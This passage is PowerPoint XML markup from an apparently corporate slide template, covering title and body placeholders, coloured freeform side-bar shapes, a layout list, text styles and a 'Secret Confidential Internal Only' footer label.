          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A74E863-F511-418D-9981-5E0855C69C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349811" y="1520825"/>
            <a:ext cx="11337925" cy="4608513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</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30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE94BDCA-2536-4B88-8AFF-EA9D29B02A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12073965" y="-3096"/>
            <a:ext cx="127000" cy="6858000"/>
            <a:chOff x="12073965" y="-3096"/>
            <a:chExt cx="127000" cy="6096000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform: Shape 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B2B01A8-CAAB-4518-BE09-E624D27BF026}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="-3096"/>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500D29"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Freeform: Shape 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C9E94D-1565-4686-817D-23CABE0CC112}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="758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96172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform: Shape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F77BBD-1B5B-40D7-B1E5-6219BFE27FE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="377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650E35"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform: Shape 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3D6627-0EFC-4C39-8842-444911AE6E29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1139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AA1830"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform: Shape 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D130F3B-87FD-4758-AA23-7FBE6A43346C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3044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AA1830"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform: Shape 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA45E26C-FFD1-46EC-9E53-5CEC439ACAAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3806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500D29"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform: Shape 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A77EB6-9400-4B43-8D26-BBB55E581F43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="3425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96172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform: Shape 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA377B7-8223-4995-8D1F-E841F6641D53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4187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650E35"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform: Shape 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5CB352-51F4-416E-9843-2FDA2CDCFFD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1520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BE172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform: Shape 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864049F1-6F28-4BD5-A3F9-787894119F0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="2282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EF7721"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Freeform: Shape 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB56152-1B05-4C86-A657-63322BDB6C9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1901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DC0A34"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Freeform: Shape 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767AB39A-DEC1-4733-932D-7B4E520D21F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="2663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EA5728"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Freeform: Shape 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{474560DA-5BC7-4BD1-B373-279BD363DCCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4568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88133E"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Freeform: Shape 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53DA5BCB-D097-4706-8AFE-10AEE639F80C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="5330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E8365C"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform: Shape 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9B4E66-BB7A-45D0-80C0-4166893C05C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="4949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AF184C"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Freeform: Shape 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57875DD7-D580-4E36-BF61-772DB9CA0278}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="5711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EB5A79"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4259915065"/>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8" r:id="rId4"/>
    <p:sldLayoutId id="2147483755" r:id="rId5"/>
    <p:sldLayoutId id="2147483756" r:id="rId6"/>
    <p:sldLayoutId id="2147483757" r:id="rId7"/>
    <p:sldLayoutId id="2147483759"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49" r:id="rId17"/>
    <p:sldLayoutId id="2147483810"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6" r:id="rId27"/>
    <p:sldLayoutId id="2147483787" r:id="rId28"/>
    <p:sldLayoutId id="2147483788" r:id="rId29"/>
    <p:sldLayoutId id="2147483789" r:id="rId30"/>
    <p:sldLayoutId id="2147483790" r:id="rId31"/>
    <p:sldLayoutId id="2147483791" r:id="rId32"/>
    <p:sldLayoutId id="2147483792" r:id="rId33"/>
    <p:sldLayoutId id="2147483785" r:id="rId34"/>
    <p:sldLayoutId id="2147483793" r:id="rId35"/>
    <p:sldLayoutId id="2147483794" r:id="rId36"/>
    <p:sldLayoutId id="2147483795" r:id="rId37"/>
    <p:sldLayoutId id="2147483796" r:id="rId38"/>
    <p:sldLayoutId id="2147483797" r:id="rId39"/>
    <p:sldLayoutId id="2147483798" r:id="rId40"/>
    <p:sldLayoutId id="2147483799" r:id="rId41"/>
    <p:sldLayoutId id="2147483800" r:id="rId42"/>
    <p:sldLayoutId id="2147483805" r:id="rId43"/>
    <p:sldLayoutId id="2147483801" r:id="rId44"/>
    <p:sldLayoutId id="2147483802" r:id="rId45"/>
    <p:sldLayoutId id="2147483803" r:id="rId46"/>
    <p:sldLayoutId id="2147483804" r:id="rId47"/>
    <p:sldLayoutId id="2147483806" r:id="rId48"/>
    <p:sldLayoutId id="2147483808" r:id="rId49"/>
    <p:sldLayoutId id="2147483809" r:id="rId50"/>
    <p:sldLayoutId id="2147483807" r:id="rId51"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" b="1" i="0" kern="1200" cap="none" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="160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100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="160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0"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="160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100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="160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100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="160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6">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="226">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="3861" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="7368" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="845" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="95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1CE8F94F-1893-4874-89C8-4AF3D9DA989D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6656700" y="6538782"/>
            <a:ext cx="5040000" cy="154069"/>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850" b="0" cap="all" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secret Confidential Internal Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AF9978-79B1-47C2-BAC6-B06FD0898A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12073965" y="-3096"/>
            <a:ext cx="127000" cy="6858000"/>
            <a:chOff x="12073965" y="-3096"/>
            <a:chExt cx="127000" cy="6096000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259AFF2A-C511-4FF5-93DF-B6C8A283C926}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="-3096"/>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500D29"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B205D5C-6DBF-4E2E-90BB-F201C6D60E4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="758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96172B"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform: Shape 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D58B0E-3B38-469F-82A8-E22EE4EFBA77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="377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650E35"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform: Shape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C8DFD0-51E4-42AD-9DF9-682FD86BC957}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12073965" y="1139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AA1830"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform: Shape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78585C1E-7A0E-4F53-ABB0-CDF4769CCB4C}"/>
                </a:ext>
              </a:extLst>
